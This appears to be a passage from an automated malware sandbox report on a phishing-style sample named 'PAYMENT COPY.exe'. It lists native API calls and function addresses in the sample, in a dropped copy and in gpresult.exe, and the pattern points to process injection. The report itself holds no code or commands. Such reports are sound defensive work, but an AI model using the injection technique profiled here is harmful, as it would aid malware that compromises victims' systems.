Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502DF0 NtQuerySystemInformation,LdrInitializeThunk,	9_2_01502DF0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502C70 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_01502C70
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015035C0 NtCreateMutant,LdrInitializeThunk,	9_2_015035C0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01504340 NtSetContextThread,	9_2_01504340
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01504650 NtSuspendThread,	9_2_01504650
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502BF0 NtAllocateVirtualMemory,	9_2_01502BF0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502BE0 NtQueryValueKey,	9_2_01502BE0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502B80 NtQueryInformationFile,	9_2_01502B80
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502BA0 NtEnumerateValueKey,	9_2_01502BA0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502AD0 NtReadFile,	9_2_01502AD0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502AF0 NtWriteFile,	9_2_01502AF0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502AB0 NtWaitForSingleObject,	9_2_01502AB0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502D10 NtMapViewOfSection,	9_2_01502D10
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502D00 NtSetInformationFile,	9_2_01502D00
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502D30 NtUnmapViewOfSection,	9_2_01502D30
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502DD0 NtDelayExecution,	9_2_01502DD0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502DB0 NtEnumerateKey,	9_2_01502DB0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502C60 NtCreateKey,	9_2_01502C60
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502C00 NtQueryInformationProcess,	9_2_01502C00
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502CC0 NtQueryVirtualMemory,	9_2_01502CC0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502CF0 NtOpenProcess,	9_2_01502CF0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502CA0 NtQueryInformationToken,	9_2_01502CA0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502F60 NtCreateProcessEx,	9_2_01502F60
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502F30 NtCreateSection,	9_2_01502F30
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502FE0 NtCreateFile,	9_2_01502FE0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502F90 NtProtectVirtualMemory,	9_2_01502F90
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502FB0 NtResumeThread,	9_2_01502FB0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502FA0 NtQuerySection,	9_2_01502FA0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502E30 NtWriteVirtualMemory,	9_2_01502E30
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502EE0 NtQueueApcThread,	9_2_01502EE0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502E80 NtReadVirtualMemory,	9_2_01502E80
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502EA0 NtAdjustPrivilegesToken,	9_2_01502EA0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01503010 NtOpenDirectoryObject,	9_2_01503010
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01503090 NtSetValueKey,	9_2_01503090
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015039B0 NtGetContextThread,	9_2_015039B0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01503D70 NtOpenThread,	9_2_01503D70
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01503D10 NtOpenProcessToken,	9_2_01503D10
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04904650 NtSuspendThread,LdrInitializeThunk,	13_2_04904650
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04904340 NtSetContextThread,LdrInitializeThunk,	13_2_04904340
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902CA0 NtQueryInformationToken,LdrInitializeThunk,	13_2_04902CA0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902C70 NtFreeVirtualMemory,LdrInitializeThunk,	13_2_04902C70
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902C60 NtCreateKey,LdrInitializeThunk,	13_2_04902C60
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902DD0 NtDelayExecution,LdrInitializeThunk,	13_2_04902DD0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902DF0 NtQuerySystemInformation,LdrInitializeThunk,	13_2_04902DF0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902D10 NtMapViewOfSection,LdrInitializeThunk,	13_2_04902D10
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902D30 NtUnmapViewOfSection,LdrInitializeThunk,	13_2_04902D30
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902E80 NtReadVirtualMemory,LdrInitializeThunk,	13_2_04902E80
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902EE0 NtQueueApcThread,LdrInitializeThunk,	13_2_04902EE0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902FB0 NtResumeThread,LdrInitializeThunk,	13_2_04902FB0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902FE0 NtCreateFile,LdrInitializeThunk,	13_2_04902FE0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902F30 NtCreateSection,LdrInitializeThunk,	13_2_04902F30
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902AD0 NtReadFile,LdrInitializeThunk,	13_2_04902AD0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902AF0 NtWriteFile,LdrInitializeThunk,	13_2_04902AF0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902BA0 NtEnumerateValueKey,LdrInitializeThunk,	13_2_04902BA0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	13_2_04902BF0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902BE0 NtQueryValueKey,LdrInitializeThunk,	13_2_04902BE0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902B60 NtClose,LdrInitializeThunk,	13_2_04902B60
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_049035C0 NtCreateMutant,LdrInitializeThunk,	13_2_049035C0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_049039B0 NtGetContextThread,LdrInitializeThunk,	13_2_049039B0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902CC0 NtQueryVirtualMemory,	13_2_04902CC0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902CF0 NtOpenProcess,	13_2_04902CF0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902C00 NtQueryInformationProcess,	13_2_04902C00
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902DB0 NtEnumerateKey,	13_2_04902DB0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902D00 NtSetInformationFile,	13_2_04902D00
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902EA0 NtAdjustPrivilegesToken,	13_2_04902EA0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902E30 NtWriteVirtualMemory,	13_2_04902E30
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902F90 NtProtectVirtualMemory,	13_2_04902F90
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902FA0 NtQuerySection,	13_2_04902FA0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902F60 NtCreateProcessEx,	13_2_04902F60
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902AB0 NtWaitForSingleObject,	13_2_04902AB0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04902B80 NtQueryInformationFile,	13_2_04902B80
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04903090 NtSetValueKey,	13_2_04903090
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04903010 NtOpenDirectoryObject,	13_2_04903010
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04903D10 NtOpenProcessToken,	13_2_04903D10
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04903D70 NtOpenThread,	13_2_04903D70
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_008880C0 NtClose,	13_2_008880C0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_00888030 NtDeleteFile,	13_2_00888030
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_00888210 NtAllocateVirtualMemory,	13_2_00888210
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_00887DF0 NtCreateFile,	13_2_00887DF0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_00887F50 NtReadFile,	13_2_00887F50

Detected potential crypto function

Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 0_2_0111D4FC	0_2_0111D4FC
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 0_2_06DB4EC8	0_2_06DB4EC8
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 0_2_06DB6F9B	0_2_06DB6F9B
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 0_2_06DB2F91	0_2_06DB2F91
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 0_2_06DB2FB0	0_2_06DB2FB0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 0_2_06DB33E8	0_2_06DB33E8
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 0_2_06DB5878	0_2_06DB5878
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 0_2_06DB3820	0_2_06DB3820
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 0_2_06DBC1B0	0_2_06DBC1B0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_00410873	9_2_00410873
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0040282B	9_2_0040282B
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_00402830	9_2_00402830
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0040E8F3	9_2_0040E8F3
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_00401D40	9_2_00401D40
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0042DD63	9_2_0042DD63
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_00401D3B	9_2_00401D3B
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_004035F0	9_2_004035F0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0041064A	9_2_0041064A
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_00410653	9_2_00410653
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_00416F63	9_2_00416F63
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01558158	9_2_01558158
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C0100	9_2_014C0100
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0156A118	9_2_0156A118
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015881CC	9_2_015881CC
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015901AA	9_2_015901AA
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015841A2	9_2_015841A2
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01562000	9_2_01562000
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0158A352	9_2_0158A352
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014DE3F0	9_2_014DE3F0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015903E6	9_2_015903E6
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01570274	9_2_01570274
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015502C0	9_2_015502C0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D0535	9_2_014D0535
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01590591	9_2_01590591
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01582446	9_2_01582446
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01574420	9_2_01574420
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0157E4F6	9_2_0157E4F6
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014F4750	9_2_014F4750
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D0770	9_2_014D0770
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014CC7C0	9_2_014CC7C0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014EC6E0	9_2_014EC6E0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014E6962	9_2_014E6962
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D29A0	9_2_014D29A0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0159A9A6	9_2_0159A9A6
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D2840	9_2_014D2840
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014DA840	9_2_014DA840
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014FE8F0	9_2_014FE8F0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014B68B8	9_2_014B68B8
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0158AB40	9_2_0158AB40
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01586BD7	9_2_01586BD7
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014CEA80	9_2_014CEA80
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0156CD1F	9_2_0156CD1F
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014DAD00	9_2_014DAD00
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014CADE0	9_2_014CADE0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014E8DBF	9_2_014E8DBF
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D0C00	9_2_014D0C00
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C0CF2	9_2_014C0CF2
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01570CB5	9_2_01570CB5
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01544F40	9_2_01544F40
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01572F30	9_2_01572F30
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01512F28	9_2_01512F28
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014F0F30	9_2_014F0F30
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C2FC8	9_2_014C2FC8
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014DCFE0	9_2_014DCFE0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0154EFA0	9_2_0154EFA0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D0E59	9_2_014D0E59
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0158EE26	9_2_0158EE26
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0158EEDB	9_2_0158EEDB
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0158CE93	9_2_0158CE93
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014E2E90	9_2_014E2E90
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0159B16B	9_2_0159B16B
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014BF172	9_2_014BF172
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0150516C	9_2_0150516C
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014DB1B0	9_2_014DB1B0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D70C0	9_2_014D70C0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0157F0CC	9_2_0157F0CC
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015870E9	9_2_015870E9
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0158F0E0	9_2_0158F0E0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014BD34C	9_2_014BD34C
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0158132D	9_2_0158132D
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0151739A	9_2_0151739A
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014EB2C0	9_2_014EB2C0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015712ED	9_2_015712ED
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D52A0	9_2_014D52A0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01587571	9_2_01587571
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015995C3	9_2_015995C3
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0156D5B0	9_2_0156D5B0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C1460	9_2_014C1460
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0158F43F	9_2_0158F43F
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0158F7B0	9_2_0158F7B0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01515630	9_2_01515630
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015816CC	9_2_015816CC
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D9950	9_2_014D9950
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014EB950	9_2_014EB950
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01565910	9_2_01565910
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0153D800	9_2_0153D800
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D38E0	9_2_014D38E0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0158FB76	9_2_0158FB76
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01545BF0	9_2_01545BF0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0150DBF9	9_2_0150DBF9
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014EFB80	9_2_014EFB80
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0158FA49	9_2_0158FA49
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01587A46	9_2_01587A46
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01543A6C	9_2_01543A6C
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0157DAC6	9_2_0157DAC6
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01515AA0	9_2_01515AA0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01571AA3	9_2_01571AA3
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0156DAAC	9_2_0156DAAC
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01581D5A	9_2_01581D5A
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D3D40	9_2_014D3D40
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01587D73	9_2_01587D73
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014EFDC0	9_2_014EFDC0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01549C32	9_2_01549C32
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0158FCF2	9_2_0158FCF2
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0158FF09	9_2_0158FF09
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01493FD2	9_2_01493FD2
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01493FD5	9_2_01493FD5
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D1F92	9_2_014D1F92
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0158FFB1	9_2_0158FFB1
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D9EB0	9_2_014D9EB0
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Code function: 10_2_0113D4FC	10_2_0113D4FC
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Code function: 10_2_05386D98	10_2_05386D98
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Code function: 10_2_05380040	10_2_05380040
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Code function: 10_2_0707B458	10_2_0707B458
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Code function: 10_2_070733D7	10_2_070733D7
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Code function: 10_2_070733E8	10_2_070733E8
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Code function: 10_2_07072F91	10_2_07072F91
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Code function: 10_2_07076F9A	10_2_07076F9A
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Code function: 10_2_07072FB0	10_2_07072FB0
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Code function: 10_2_07074EC8	10_2_07074EC8
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Code function: 10_2_07073820	10_2_07073820
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Code function: 10_2_07075878	10_2_07075878
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Code function: 12_2_03B53BB6	12_2_03B53BB6
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Code function: 12_2_03B5A2A6	12_2_03B5A2A6
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Code function: 12_2_03B53996	12_2_03B53996
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Code function: 12_2_03B5398D	12_2_03B5398D
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Code function: 12_2_03B710A6	12_2_03B710A6
Source: C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe	Code function: 12_2_03B51C36	12_2_03B51C36
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0497E4F6	13_2_0497E4F6
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04974420	13_2_04974420
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04982446	13_2_04982446
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04990591	13_2_04990591
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048D0535	13_2_048D0535
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048EC6E0	13_2_048EC6E0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048CC7C0	13_2_048CC7C0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048F4750	13_2_048F4750
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048D0770	13_2_048D0770
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04962000	13_2_04962000
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_049901AA	13_2_049901AA
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_049841A2	13_2_049841A2
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_049881CC	13_2_049881CC
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048C0100	13_2_048C0100
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0496A118	13_2_0496A118
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04958158	13_2_04958158
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_049502C0	13_2_049502C0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04970274	13_2_04970274
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048DE3F0	13_2_048DE3F0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_049903E6	13_2_049903E6
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0498A352	13_2_0498A352
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04970CB5	13_2_04970CB5
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048C0CF2	13_2_048C0CF2
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048D0C00	13_2_048D0C00
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048E8DBF	13_2_048E8DBF
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048CADE0	13_2_048CADE0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0496CD1F	13_2_0496CD1F
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048DAD00	13_2_048DAD00
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0498CE93	13_2_0498CE93
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048E2E90	13_2_048E2E90
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0498EEDB	13_2_0498EEDB
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0498EE26	13_2_0498EE26
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048D0E59	13_2_048D0E59
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_0494EFA0	13_2_0494EFA0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048C2FC8	13_2_048C2FC8
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_048DCFE0	13_2_048DCFE0
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04972F30	13_2_04972F30
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 13_2_04912F28	13_2_04912F28
